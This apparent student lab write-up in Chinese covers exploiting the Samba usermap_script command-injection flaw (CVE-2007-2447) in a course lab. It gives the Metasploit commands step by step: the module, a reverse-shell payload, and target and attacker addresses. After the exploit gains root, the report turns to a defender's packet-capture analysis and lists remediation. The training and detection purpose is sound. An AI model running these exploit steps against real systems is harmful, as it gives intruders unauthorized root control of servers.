20253914 2025-2026-2 《网络攻防实践》第7周作业
一、实践内容
- 使用Metasploit进行Linux远程渗透攻击
Samba Usermap_script 漏洞
漏洞编号:CVE-2007-2447
漏洞成因:Samba 服务配置username map script时,未对客户端传入的用户名做过滤,直接拼接带入 shell 执行,导致命令注入。
漏洞危害:未授权远程命令执行,攻击者无需账号密码,即可执行系统命令,获取服务器最高权限。
修复措施:
- 关闭username map script危险配置;
- 升级 Samba 至安全版本;
- 限制 445 端口访问,做好边界防护
- 进行攻防对抗实践
二、实践过程
(一) 使用Metasploit进行Linux远程渗透攻击
- 终端打开msfconsole
![image]()
- use exploit/multi/samba/usermap_script使用该模块进行攻击,输入show payloads查看漏洞的载荷
![image]()
- set payload cmd/unix/reverse设置双向连接载荷,输入show options显示需要设置的参数
![image]()
- 输入set RHOST 192.168.200.18 设置靶机的地址,输入set LHOST 192.168.200.13设置攻击机地址,
![image]()
- 输入run执行渗透攻击
输入ifconfig得出靶机IP地址,表示攻击成功,与在linux执行ifconfig操作,输出结果一致
![image]()
![image]()
(二)攻防对抗实践
- 攻击方执行与任务一相同的操作,通过输入whoami可以看到,已经获取了root权限
![image]()
- 防守方抓包分析
![image]()
| 项目 | 结果 | 依据 |
|---|---|---|
| 攻击者 IP | 192.168.200.13 | 抓包中主动发起 SMB 连接、畸形 Session Setup 请求的主机 |
| 目标 IP | 192.168.200.18 | 响应 SMB 请求、返回STATUS_LOGON_FAILURE的主机 |
| 目标端口 | TCP/139(NetBIOS SMB) | 初始三次握手、协议协商、会话建立均使用 139 端口 |
| 反向 Shell 端口 | TCP/4444 | 目标主机主动向攻击者 IP 发起的反向连接端口,Metasploit 默认反向 shell 端口 |
| 攻击发起时间 | 抓包时间戳最早的数据包:00000000(对应会话起始) | 抓包中首个 SYN 包为攻击起始点 |
| 攻击利用漏洞 | Samba usermap_script 命令注入漏洞(CVE-2007-2447) | 匹配特征:畸形 SMB Session Setup 请求 + STATUS_LOGON_FAILURE + 目标主动发起 4444 反向连接 |
| Shellcode 特征 | Metasploit 生成的 Linux/Windows 反向 Shellcode | 目标主机主动发起57604 → 4444的 TCP 连接,是典型的反向 Shell payload 执行后的行为 |
| 攻击结果 | 漏洞触发成功,但登录流程失败,反向 Shell 连接建立 | 目标返回STATUS_LOGON_FAILURE,但反向 TCP 三次握手完成 |
追踪tcp流发现攻击方执行了whoami操作

三、实践总结
认识了 CVE-2007-2447 等历史高危漏洞的利用逻辑,理解恶意 Shellcode、反向 Shell 的作用,清楚攻击者通过命令注入、反弹端口实现远程控制的原理,知晓畸形报文、异常主动外联是入侵核心特征。







